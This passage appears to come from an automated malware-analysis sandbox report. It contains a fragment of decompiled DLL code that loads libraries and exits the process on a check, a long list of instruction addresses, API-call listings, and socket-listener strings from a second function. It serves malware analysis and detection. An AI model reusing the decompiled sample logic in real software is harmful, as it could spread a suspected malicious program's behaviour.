									_push(_t507);
									_push(_t484);
									wsprintfW( &_v600, StrChrW(0x7098c658, 0x25));
									_t542 = _t540 + 0x24;
									HeapFree(GetProcessHeap(), 0, _t507);
									_t381 = LoadLibraryW( &_v592);
									 *0x7098f554 = _t381;
									if(_t381 != 0) {
										_v968 = 0xd80564c;
										_v964 = E70988960;
										_v960 = 0x7098f6b4;
										_v956 = 0;
										E70982030(_t381,  &_v968, 1, 0x4b4ca51f);
										_t542 = _t542 + 0x10;
									}
									_t382 = E70983340(0xffffffff);
									_push(0xa);
									_push(0x10);
									 *0x7098f59c = _t382;
									_push(StrChrW(0x7098ce20, 0x31));
									_push(E70981DE0(0x4b0e0c3b, _t514));
									E709889F0();
									if(E7098BBA0(0) != 0) {
										ExitProcess(0);
									}
									 *0x7098f6c4 = 2;
									return 1;
								} else {
									goto L108;
								}
							}
						}
					}
				}
			}
































































































































































































































                                                                                                        0x70988af4
                                                                                                        0x70988afe
                                                                                                        0x70988b02
                                                                                                        0x7098996d
                                                                                                        0x7098997e
                                                                                                        0x70989980
                                                                                                        0x70989987
                                                                                                        0x70989987
                                                                                                        0x70989989
                                                                                                        0x7098998e
                                                                                                        0x70989990
                                                                                                        0x70989997
                                                                                                        0x70989997
                                                                                                        0x70989999
                                                                                                        0x7098999e
                                                                                                        0x709899a0
                                                                                                        0x709899a7
                                                                                                        0x709899a7
                                                                                                        0x709899a9
                                                                                                        0x709899ae
                                                                                                        0x709899b0
                                                                                                        0x709899b7
                                                                                                        0x709899b7
                                                                                                        0x709899b9
                                                                                                        0x709899be
                                                                                                        0x709899c0
                                                                                                        0x709899c2
                                                                                                        0x709899c3
                                                                                                        0x709899c9
                                                                                                        0x709899d6
                                                                                                        0x709899cb
                                                                                                        0x709899cb
                                                                                                        0x709899cb
                                                                                                        0x709899c9
                                                                                                        0x709899d8
                                                                                                        0x709899dd
                                                                                                        0x709899df
                                                                                                        0x709899e1
                                                                                                        0x709899e2
                                                                                                        0x709899e8
                                                                                                        0x709899f5
                                                                                                        0x709899ea
                                                                                                        0x709899ea
                                                                                                        0x709899ea
                                                                                                        0x709899e8
                                                                                                        0x709899f7
                                                                                                        0x709899fc
                                                                                                        0x709899fe
                                                                                                        0x70989a05
                                                                                                        0x70989a05
                                                                                                        0x70989a07
                                                                                                        0x70989a0d
                                                                                                        0x70989a13
                                                                                                        0x70989a1e
                                                                                                        0x70989a20
                                                                                                        0x70989a23
                                                                                                        0x70989a23
                                                                                                        0x70989a25
                                                                                                        0x70989a2a
                                                                                                        0x70989a2c
                                                                                                        0x70989a2f
                                                                                                        0x70989a2f
                                                                                                        0x70989a31
                                                                                                        0x70989a36
                                                                                                        0x70989a38
                                                                                                        0x70989a3b
                                                                                                        0x70989a3b
                                                                                                        0x70989a3d
                                                                                                        0x70989a42
                                                                                                        0x70989a44
                                                                                                        0x70989a47
                                                                                                        0x70989a47
                                                                                                        0x70989a49
                                                                                                        0x70989a4e
                                                                                                        0x70989a50
                                                                                                        0x70989a53
                                                                                                        0x70989a53
                                                                                                        0x70989a55
                                                                                                        0x70989a5a
                                                                                                        0x70989a5c
                                                                                                        0x70989a5f
                                                                                                        0x70989a5f
                                                                                                        0x70989a61
                                                                                                        0x70989a66
                                                                                                        0x70989a68
                                                                                                        0x70989a6b
                                                                                                        0x70989a6b
                                                                                                        0x70989a6d
                                                                                                        0x70989a72
                                                                                                        0x70989a74
                                                                                                        0x70989a7b
                                                                                                        0x70989a7b
                                                                                                        0x70989a7d
                                                                                                        0x70989a82
                                                                                                        0x70989a84
                                                                                                        0x70989a87
                                                                                                        0x70989a87
                                                                                                        0x70989a8d
                                                                                                        0x70989a94
                                                                                                        0x70989a97
                                                                                                        0x70989a97
                                                                                                        0x70989a9c
                                                                                                        0x70989aa2
                                                                                                        0x70989aa4
                                                                                                        0x70989aa4
                                                                                                        0x70989aaf
                                                                                                        0x70989ab4
                                                                                                        0x70989ab4
                                                                                                        0x70989ab6
                                                                                                        0x70989ab8
                                                                                                        0x70989abb
                                                                                                        0x70989abb
                                                                                                        0x70989abd
                                                                                                        0x70989ac0
                                                                                                        0x70989ac0
                                                                                                        0x70989ac8
                                                                                                        0x70989acd
                                                                                                        0x70989acf
                                                                                                        0x70989ad3
                                                                                                        0x70989ad8
                                                                                                        0x70989ade
                                                                                                        0x70989ade
                                                                                                        0x70989acf
                                                                                                        0x00000000
                                                                                                        0x70988b08
                                                                                                        0x70988b09
                                                                                                        0x70989ae3
                                                                                                        0x70989aef
                                                                                                        0x70988b0f
                                                                                                        0x70988b17
                                                                                                        0x70988b31
                                                                                                        0x70988b36
                                                                                                        0x70988b43
                                                                                                        0x70988b4b
                                                                                                        0x70988b58
                                                                                                        0x70988b5b
                                                                                                        0x70988b5b
                                                                                                        0x70988b61
                                                                                                        0x70988b6e
                                                                                                        0x70988b7a
                                                                                                        0x70988b8a
                                                                                                        0x70988b9c
                                                                                                        0x70988ba4
                                                                                                        0x70988ba6
                                                                                                        0x70988baf
                                                                                                        0x70988bb8
                                                                                                        0x70988bbd
                                                                                                        0x70988bc2
                                                                                                        0x70988bc7
                                                                                                        0x70988bce
                                                                                                        0x70988bd4
                                                                                                        0x70988bda
                                                                                                        0x70988be1
                                                                                                        0x70988be3
                                                                                                        0x70988bea
                                                                                                        0x70988bf0
                                                                                                        0x70988c00
                                                                                                        0x70988c05
                                                                                                        0x70988c0d
                                                                                                        0x70988c17
                                                                                                        0x70988c2f
                                                                                                        0x70988c3d
                                                                                                        0x70988c46
                                                                                                        0x00000000
                                                                                                        0x70988c48
                                                                                                        0x70988c49
                                                                                                        0x70988c49
                                                                                                        0x70988c46
                                                                                                        0x70988c4f
                                                                                                        0x70988c59
                                                                                                        0x70988c62
                                                                                                        0x70988c67
                                                                                                        0x70988c6d
                                                                                                        0x70988c74
                                                                                                        0x70988c7f
                                                                                                        0x70988c84
                                                                                                        0x70988c93
                                                                                                        0x70988c98
                                                                                                        0x70988ca2
                                                                                                        0x70988cac
                                                                                                        0x70988cb8
                                                                                                        0x70988cbd
                                                                                                        0x70988cc2
                                                                                                        0x70988cc5
                                                                                                        0x70988cca
                                                                                                        0x70988cd0
                                                                                                        0x70988cdb
                                                                                                        0x70988ce3
                                                                                                        0x00000000
                                                                                                        0x70988ce9
                                                                                                        0x70988ce9
                                                                                                        0x70988cec
                                                                                                        0x70988cf4
                                                                                                        0x00000000
                                                                                                        0x70988cfa
                                                                                                        0x70988d00
                                                                                                        0x70988d08
                                                                                                        0x70988d09
                                                                                                        0x70988d0e
                                                                                                        0x70988d10
                                                                                                        0x70988d11
                                                                                                        0x70988d12
                                                                                                        0x70988d19
                                                                                                        0x70988d20
                                                                                                        0x70988d27
                                                                                                        0x70988d61
                                                                                                        0x70988d29
                                                                                                        0x70988d33
                                                                                                        0x70988d35
                                                                                                        0x70988d3c
                                                                                                        0x70988d44
                                                                                                        0x70988d4c
                                                                                                        0x70988d54
                                                                                                        0x70988d56
                                                                                                        0x70988d5c
                                                                                                        0x70988d5c
                                                                                                        0x70988d54
                                                                                                        0x70988d3c
                                                                                                        0x70988d6b
                                                                                                        0x70988d74
                                                                                                        0x70988d75
                                                                                                        0x70988d7a
                                                                                                        0x70988d7c
                                                                                                        0x70988d7d
                                                                                                        0x70988d7e
                                                                                                        0x70988d85
                                                                                                        0x70988d8c
                                                                                                        0x70988dc9
                                                                                                        0x70988d8e
                                                                                                        0x70988d98
                                                                                                        0x70988d9a
                                                                                                        0x70988da1
                                                                                                        0x70988dab
                                                                                                        0x70988db3
                                                                                                        0x70988dbb
                                                                                                        0x70988dbd
                                                                                                        0x70988dc4
                                                                                                        0x70988dc4
                                                                                                        0x70988dbb
                                                                                                        0x70988da1
                                                                                                        0x70988dd3
                                                                                                        0x70988dd9
                                                                                                        0x70988de6
                                                                                                        0x70988dec
                                                                                                        0x70988df5
                                                                                                        0x70988df7
                                                                                                        0x70988dfe
                                                                                                        0x70988e0f
                                                                                                        0x70988e19
                                                                                                        0x70988e1a
                                                                                                        0x70988e1f
                                                                                                        0x70988e27
                                                                                                        0x70988e29
                                                                                                        0x70988e31
                                                                                                        0x70988e37
                                                                                                        0x70988e3d
                                                                                                        0x70988e40
                                                                                                        0x70988e40
                                                                                                        0x70988e4e
                                                                                                        0x70988e5e
                                                                                                        0x70988e63
                                                                                                        0x70988e78
                                                                                                        0x70988e85
                                                                                                        0x70988e95
                                                                                                        0x70988ea5
                                                                                                        0x70988eb5
                                                                                                        0x70988ec5
                                                                                                        0x70988ed5
                                                                                                        0x70988ee8
                                                                                                        0x70988ef8
                                                                                                        0x70988f08
                                                                                                        0x70988f18
                                                                                                        0x70988f28
                                                                                                        0x70988f38
                                                                                                        0x70988f48
                                                                                                        0x70988f58
                                                                                                        0x70988f6b
                                                                                                        0x70988f70
                                                                                                        0x70988f79
                                                                                                        0x70988f8a
                                                                                                        0x70988f95
                                                                                                        0x70988faa
                                                                                                        0x70988fba
                                                                                                        0x70988fca
                                                                                                        0x70988fcf
                                                                                                        0x70988fd4
                                                                                                        0x70988fd7
                                                                                                        0x70988fdc
                                                                                                        0x70988fe2
                                                                                                        0x70988fe8
                                                                                                        0x70988ff2
                                                                                                        0x70988ff6
                                                                                                        0x70989000
                                                                                                        0x70989006
                                                                                                        0x7098900d
                                                                                                        0x7098900f
                                                                                                        0x70989014
                                                                                                        0x70989019
                                                                                                        0x70989042
                                                                                                        0x70989042
                                                                                                        0x70989046
                                                                                                        0x70989049
                                                                                                        0x7098904c
                                                                                                        0x70989060
                                                                                                        0x70989060
                                                                                                        0x70989063
                                                                                                        0x70989065
                                                                                                        0x70989069
                                                                                                        0x7098906b
                                                                                                        0x7098906b
                                                                                                        0x70989069
                                                                                                        0x7098904e
                                                                                                        0x7098904e
                                                                                                        0x70989052
                                                                                                        0x00000000
                                                                                                        0x70989054
                                                                                                        0x70989054
                                                                                                        0x70989054
                                                                                                        0x70989052
                                                                                                        0x7098901b
                                                                                                        0x7098901b
                                                                                                        0x70989023
                                                                                                        0x00000000
                                                                                                        0x7098902b
                                                                                                        0x7098902b
                                                                                                        0x7098902f
                                                                                                        0x70989031
                                                                                                        0x70989037
                                                                                                        0x7098903b
                                                                                                        0x7098903b
                                                                                                        0x70989023
                                                                                                        0x70989075
                                                                                                        0x70989076
                                                                                                        0x70989014
                                                                                                        0x7098907b
                                                                                                        0x7098907b
                                                                                                        0x70989081
                                                                                                        0x70989083
                                                                                                        0x70989088
                                                                                                        0x7098908d
                                                                                                        0x70989096
                                                                                                        0x7098909b
                                                                                                        0x709890a0
                                                                                                        0x709890a6
                                                                                                        0x709890af
                                                                                                        0x709890c6
                                                                                                        0x709890cb
                                                                                                        0x709890d1
                                                                                                        0x709890d9
                                                                                                        0x709890df
                                                                                                        0x709890e9
                                                                                                        0x709890ef
                                                                                                        0x709890fc
                                                                                                        0x70989101
                                                                                                        0x70989109
                                                                                                        0x70989117
                                                                                                        0x70989119
                                                                                                        0x7098911e
                                                                                                        0x70989124
                                                                                                        0x70989125
                                                                                                        0x70989126
                                                                                                        0x7098912a
                                                                                                        0x70989132
                                                                                                        0x70989136
                                                                                                        0x7098913a
                                                                                                        0x7098913e
                                                                                                        0x70989143
                                                                                                        0x70989147
                                                                                                        0x7098914c
                                                                                                        0x7098914e
                                                                                                        0x7098914e
                                                                                                        0x70989159
                                                                                                        0x7098915e
                                                                                                        0x7098916d
                                                                                                        0x7098916e
                                                                                                        0x70989187
                                                                                                        0x70989189
                                                                                                        0x70989194
                                                                                                        0x7098919a
                                                                                                        0x709891a6
                                                                                                        0x709891a9
                                                                                                        0x709891a9
                                                                                                        0x709891af
                                                                                                        0x709891bd
                                                                                                        0x709891c7
                                                                                                        0x709891cc
                                                                                                        0x709891d2
                                                                                                        0x709891d3
                                                                                                        0x709891d4
                                                                                                        0x709891dc
                                                                                                        0x709891e0
                                                                                                        0x709891e4
                                                                                                        0x709891e8
                                                                                                        0x709891ed
                                                                                                        0x709891f1
                                                                                                        0x709891f6
                                                                                                        0x709891f8
                                                                                                        0x709891f8
                                                                                                        0x7098920e
                                                                                                        0x70989216
                                                                                                        0x7098921e
                                                                                                        0x70989226
                                                                                                        0x7098922a
                                                                                                        0x70989232
                                                                                                        0x7098923a
                                                                                                        0x70989242
                                                                                                        0x70989246
                                                                                                        0x7098924e
                                                                                                        0x70989256
                                                                                                        0x7098925e
                                                                                                        0x70989262
                                                                                                        0x7098926a
                                                                                                        0x70989272
                                                                                                        0x7098927a
                                                                                                        0x7098927e
                                                                                                        0x70989286
                                                                                                        0x7098928e
                                                                                                        0x70989296
                                                                                                        0x7098929a
                                                                                                        0x7098929f
                                                                                                        0x7098929f
                                                                                                        0x709892b0
                                                                                                        0x709892b1
                                                                                                        0x709892b6
                                                                                                        0x709892c9
                                                                                                        0x709892cb
                                                                                                        0x709892d6
                                                                                                        0x709892dc
                                                                                                        0x709892e3
                                                                                                        0x709892f9
                                                                                                        0x70989304
                                                                                                        0x7098930f
                                                                                                        0x7098931a
                                                                                                        0x70989321
                                                                                                        0x7098932c
                                                                                                        0x70989337
                                                                                                        0x70989342
                                                                                                        0x70989349
                                                                                                        0x70989354
                                                                                                        0x7098935f
                                                                                                        0x7098936a
                                                                                                        0x70989371
                                                                                                        0x7098937c
                                                                                                        0x70989387
                                                                                                        0x70989392
                                                                                                        0x70989399
                                                                                                        0x709893a4
                                                                                                        0x709893af
                                                                                                        0x709893ba
                                                                                                        0x709893c1
                                                                                                        0x709893cc
                                                                                                        0x709893d7
                                                                                                        0x709893e2
                                                                                                        0x709893e9
                                                                                                        0x709893f4
                                                                                                        0x709893ff
                                                                                                        0x7098940a
                                                                                                        0x70989411
                                                                                                        0x7098941c
                                                                                                        0x70989427
                                                                                                        0x70989432
                                                                                                        0x70989439
                                                                                                        0x70989444
                                                                                                        0x7098944f
                                                                                                        0x7098945a
                                                                                                        0x70989461
                                                                                                        0x7098946c
                                                                                                        0x70989477
                                                                                                        0x70989482
                                                                                                        0x70989489
                                                                                                        0x70989494
                                                                                                        0x7098949f
                                                                                                        0x709894aa
                                                                                                        0x709894b1
                                                                                                        0x709894bc
                                                                                                        0x709894c7
                                                                                                        0x709894d2
                                                                                                        0x709894d9
                                                                                                        0x709894e4
                                                                                                        0x709894ef
                                                                                                        0x709894fa
                                                                                                        0x70989501
                                                                                                        0x7098950c
                                                                                                        0x70989517
                                                                                                        0x70989522
                                                                                                        0x70989529
                                                                                                        0x70989534
                                                                                                        0x7098953f
                                                                                                        0x7098954a
                                                                                                        0x70989551
                                                                                                        0x7098955c
                                                                                                        0x70989567
                                                                                                        0x70989572
                                                                                                        0x70989579
                                                                                                        0x70989584
                                                                                                        0x7098958f
                                                                                                        0x7098959a
                                                                                                        0x709895a1
                                                                                                        0x709895a6
                                                                                                        0x709895ac
                                                                                                        0x709895b1
                                                                                                        0x709895b6
                                                                                                        0x709895bb
                                                                                                        0x709895bf
                                                                                                        0x709895c2
                                                                                                        0x709895c7
                                                                                                        0x709895cb
                                                                                                        0x709895d0
                                                                                                        0x709895d5
                                                                                                        0x709895d9
                                                                                                        0x709895e6
                                                                                                        0x709895eb
                                                                                                        0x709895f0
                                                                                                        0x709895fc
                                                                                                        0x70989601
                                                                                                        0x70989606
                                                                                                        0x7098960c
                                                                                                        0x70989618
                                                                                                        0x7098961d
                                                                                                        0x70989623
                                                                                                        0x70989623
                                                                                                        0x7098962d
                                                                                                        0x70989632
                                                                                                        0x7098963b
                                                                                                        0x7098963c
                                                                                                        0x7098964f
                                                                                                        0x70989651
                                                                                                        0x7098965c
                                                                                                        0x70989662
                                                                                                        0x70989669
                                                                                                        0x7098967c
                                                                                                        0x70989684
                                                                                                        0x7098968c
                                                                                                        0x70989694
                                                                                                        0x70989698
                                                                                                        0x709896a0
                                                                                                        0x709896a8
                                                                                                        0x709896b0
                                                                                                        0x709896b4
                                                                                                        0x709896bc
                                                                                                        0x709896c4
                                                                                                        0x709896cc
                                                                                                        0x709896d0
                                                                                                        0x709896d8
                                                                                                        0x709896e0
                                                                                                        0x709896e8
                                                                                                        0x709896ec
                                                                                                        0x709896f1
                                                                                                        0x709896f1
                                                                                                        0x709896fa
                                                                                                        0x709896ff
                                                                                                        0x70989708
                                                                                                        0x70989709
                                                                                                        0x7098971c
                                                                                                        0x7098971e
                                                                                                        0x70989729
                                                                                                        0x7098972f
                                                                                                        0x70989736
                                                                                                        0x70989745
                                                                                                        0x7098974d
                                                                                                        0x70989755
                                                                                                        0x7098975d
                                                                                                        0x70989761
                                                                                                        0x70989769
                                                                                                        0x70989771
                                                                                                        0x70989779
                                                                                                        0x7098977d
                                                                                                        0x70989782
                                                                                                        0x70989782
                                                                                                        0x70989793
                                                                                                        0x70989794
                                                                                                        0x70989799
                                                                                                        0x709897ac
                                                                                                        0x709897ae
                                                                                                        0x709897b9
                                                                                                        0x709897bf
                                                                                                        0x709897c6
                                                                                                        0x709897d5
                                                                                                        0x709897dd
                                                                                                        0x709897e5
                                                                                                        0x709897ed
                                                                                                        0x709897f1
                                                                                                        0x709897f6
                                                                                                        0x709897f6
                                                                                                        0x709897ff
                                                                                                        0x70989804
                                                                                                        0x7098980d
                                                                                                        0x7098980e
                                                                                                        0x70989821
                                                                                                        0x70989823
                                                                                                        0x7098982e
                                                                                                        0x70989834
                                                                                                        0x7098983b
                                                                                                        0x70989850
                                                                                                        0x70989858
                                                                                                        0x70989860
                                                                                                        0x70989868
                                                                                                        0x7098986c
                                                                                                        0x70989871
                                                                                                        0x70989871
                                                                                                        0x70989882
                                                                                                        0x70989887
                                                                                                        0x70989896
                                                                                                        0x70989898
                                                                                                        0x70989899
                                                                                                        0x709898ac
                                                                                                        0x709898b2
                                                                                                        0x709898be
                                                                                                        0x709898cc
                                                                                                        0x709898d2
                                                                                                        0x709898d9
                                                                                                        0x709898e8
                                                                                                        0x709898f0
                                                                                                        0x709898f8
                                                                                                        0x70989900
                                                                                                        0x70989904
                                                                                                        0x70989909
                                                                                                        0x70989909
                                                                                                        0x7098990e
                                                                                                        0x70989916
                                                                                                        0x70989918
                                                                                                        0x70989921
                                                                                                        0x70989928
                                                                                                        0x70989937
                                                                                                        0x70989938
                                                                                                        0x70989948
                                                                                                        0x7098994b
                                                                                                        0x7098994b
                                                                                                        0x70989954
                                                                                                        0x7098996a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70988e4e
                                                                                                        0x70988cf4
                                                                                                        0x70988ce3
                                                                                                        0x70988b09

                                                                                                        APIs
                                                                                                        • DisableThreadLibraryCalls.KERNEL32(?), ref: 70988B17
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 70988B1E
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 70988B3A
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70988B43
                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000105), ref: 70988B50
                                                                                                        • ExitProcess.KERNEL32 ref: 70988B5B
                                                                                                        • PathAddBackslashW.SHLWAPI(00A51CC8), ref: 70988B6E
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 70988B77
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70988B7A
                                                                                                        • GetModuleFileNameW.KERNEL32(?,00000000,00000104), ref: 70988B8F
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 70988BA1
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70988BA4
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00A4B6C8), ref: 70988BBD
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(00A4B6C8,00000000,00A4B6C8), ref: 70988BD4
                                                                                                        • PathAddBackslashW.SHLWAPI(00A4B6C8), ref: 70988BE1
                                                                                                        • SetCurrentDirectoryW.KERNEL32(00A4B6C8), ref: 70988BEA
                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 70988C05
                                                                                                        • PathAddBackslashW.SHLWAPI(?), ref: 70988C17
                                                                                                        • StrChrW.SHLWAPI(7098CE48,00000066), ref: 70988C20
                                                                                                        • lstrcatW.KERNEL32(?,00000000), ref: 70988C2F
                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 70988C3D
                                                                                                        • ExitProcess.KERNEL32 ref: 70988C49
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A51CC8), ref: 70989984
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70989987
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A4B6C8), ref: 70989994
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70989997
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A610B8), ref: 709899A4
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709899A7
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A42BB0), ref: 709899B4
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709899B7
                                                                                                        • WTSFreeMemory.WTSAPI32(00A521E0), ref: 709899CB
                                                                                                        • WTSFreeMemory.WTSAPI32(00A599F8), ref: 709899EA
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A65BE8), ref: 70989A02
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70989A05
                                                                                                        • FreeLibrary.KERNEL32(6CAF0000), ref: 70989A23
                                                                                                        • FreeLibrary.KERNEL32(77400000), ref: 70989A2F
                                                                                                        • FreeLibrary.KERNEL32(760B0000), ref: 70989A3B
                                                                                                        • FreeLibrary.KERNEL32(75D50000), ref: 70989A47
                                                                                                        • FreeLibrary.KERNEL32(73DE0000), ref: 70989A53
                                                                                                        • FreeLibrary.KERNEL32(75EC0000), ref: 70989A5F
                                                                                                        • FreeLibrary.KERNEL32(708C0000), ref: 70989A6B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Free$Process$Library$Path$AllocBackslashFileMemory$DirectoryExitModule$AttributesCallsCurrentDisableFolderHandleMoveNameRemoveSpecSpecialSystemThreadlstrcat
                                                                                                        • String ID: 8?x$PBx$\dx$g
                                                                                                        • API String ID: 3911766576-1573909000
                                                                                                        • Opcode ID: ff3428f451c05731e8782d0e3f1fa42d3d3d70a01c623387e74d06210e88188e
                                                                                                        • Instruction ID: cbb41231afa4e48f1977ab050944e11eef4408d2a519d3023064fb1959dbfdce
                                                                                                        • Opcode Fuzzy Hash: ff3428f451c05731e8782d0e3f1fa42d3d3d70a01c623387e74d06210e88188e
                                                                                                        • Instruction Fuzzy Hash: 44825AB2518344AFC3209F66CC99B6F7BA8FB94344F20992DF15A973E0E7749400DB66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00511D6F, Relevance: 136.2, APIs: 48, Strings: 29, Instructions: 1456networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00511D91
                                                                                                        • _memset.LIBCMT ref: 00511DC6
                                                                                                        • _memset.LIBCMT ref: 00511DD2
                                                                                                        • socket.WS2_32(00000002,?,00000000), ref: 00511DE0
                                                                                                        • WSAGetLastError.WS2_32 ref: 00511DF1
                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,004E3FC0,00000000,00000000,?,?,00000338,?,?,?,?,?,?,Default), ref: 004A18C0
                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                        • htonl.WS2_32(00000000), ref: 00511ED5
                                                                                                        • htons.WS2_32(?), ref: 00511EF0
                                                                                                        • WSAGetLastError.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 00511F27
                                                                                                        Strings
                                                                                                        • Error: , xrefs: 0051292B
                                                                                                        • SocketListener.startListening: bad arguments, xrefs: 005132A4
                                                                                                        • StartWT.PortInUse P=, xrefs: 0051229A
                                                                                                        • 127.0.0.1, xrefs: 00511EDD
                                                                                                        • nsSocklist.Error.On.accept: , xrefs: 00512819
                                                                                                        • SockList.IncomingDenied.HTTP NoOfRejects: , xrefs: 00512702
                                                                                                        • StartWT.Listening P=, xrefs: 005120E6
                                                                                                        • ncSocklist.Error.reading.from.socket: , xrefs: 0051295A
                                                                                                        • SocketListener.startListening: bind failed on port , xrefs: 00512032
                                                                                                        • ?s=, xrefs: 00512ADB
                                                                                                        • Not logged Errors:, xrefs: 0051247F
                                                                                                        • GET , xrefs: 00512A85
                                                                                                        • SockList.IncomingDenied.TCP, xrefs: 00512EF0
                                                                                                        • ncSocklist.Error.On.select: , xrefs: 005124AB
                                                                                                        • SocketListener.startListening: setsockopt(SO_REUSEADDR) failed with error , xrefs: 00511F42
                                                                                                        • with error , xrefs: 00512008
                                                                                                        • POST , xrefs: 00512A9F
                                                                                                        • ncSocklist.Already.gracefully.closed.socket: , xrefs: 00512A1F
                                                                                                        • NoOfAccepts: , xrefs: 005126DA
                                                                                                        • StartWT.Bind.FinalFailure P=, xrefs: 00512224
                                                                                                        • ncSocklist.No.ConnectionThread.for.SessionID: , xrefs: 00512C49
                                                                                                        • ?s=00000000, xrefs: 00512AC0
                                                                                                        • ncSocklist.Socket.TimedOut.With.No.Action: , xrefs: 00512D9E
                                                                                                        • SocketListener.startListening: socket failed with error , xrefs: 00511E08
                                                                                                        • SockList.InvalidUDP, xrefs: 00513253
                                                                                                        • ncSocklist.Wrong.Data.on.Port.80: , xrefs: 00512CD2
                                                                                                        • SocketListener.startListening: setsockopt(SO_BROADCAST) failed with error , xrefs: 00513108
                                                                                                        • nsSocklist.Listening.Port.is.not.valid m_Port=, xrefs: 00512E71
                                                                                                        • SocketListener.startListening: listen failed with error , xrefs: 005121C0, 00512F55
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$ErrorInitializeLast_memset$DeleteH_prolog3_H_prolog3_catch_swprintfhtonlhtonssocket
